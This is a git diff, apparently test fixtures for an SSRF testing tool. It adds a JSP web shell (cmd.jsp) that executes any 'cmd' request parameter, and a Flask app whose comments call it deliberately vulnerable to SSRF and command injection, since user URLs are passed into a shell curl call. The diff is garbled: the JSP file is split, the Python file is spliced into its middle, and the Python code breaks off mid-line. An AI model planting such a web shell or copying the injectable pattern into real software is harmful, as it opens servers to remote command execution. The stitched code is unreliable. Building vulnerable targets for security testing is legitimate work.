diff --git a/data/cmd.jsp b/data/cmd.jsp new file mode 100644 index 0000000..a7d2bb7 --- /dev/null +++ b/data/cmd.jsp @@ -0,0 +1,23 @@ +<%@ page import="java.util.*,java.io.*"%> +
+ ++<% +if (request.getParameter("cmd") != null) { + out.println("Command: " + request.getParameter("cmd") + "+ \ No newline at end of file diff --git a/data/example.py b/data/example.py new file mode 100644 index 0000000..ddacbba --- /dev/null +++ b/data/example.py @@ -0,0 +1,58 @@ +# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE) +# NOTE: this file should become a simple ssrf example in order to test SSRFmap +# FLASK_APP=example.py flask run + +from flask import Flask, abort, request +import json +import re +import subprocess + +app = Flask(__name__) + +@app.route("/") +def hello(): + return "SSRF Example!" + +# curl -i -X POST -d 'url=http://example.com' http://localhost:5000/ssrf +@app.route("/ssrf", methods=['POST']) +def ssrf(): + data = request.values + content = command(f"curl {data.get('url')}") + return content + +# curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2 +@app.route("/ssrf2", methods=['POST']) +def ssrf2(): + data = request.json + print(data) + print(data.get('url')) + content = command(f"curl {data.get('url')}") + return content + +# curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" +@app.route("/ssrf3", methods=['GET']) +def ssrf3(): + data = request.values + content = command(f"curl {data.get('url')}") + return content + +# curl -X POST -H "Content-Type: application/xml" -d '
"); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } +%> +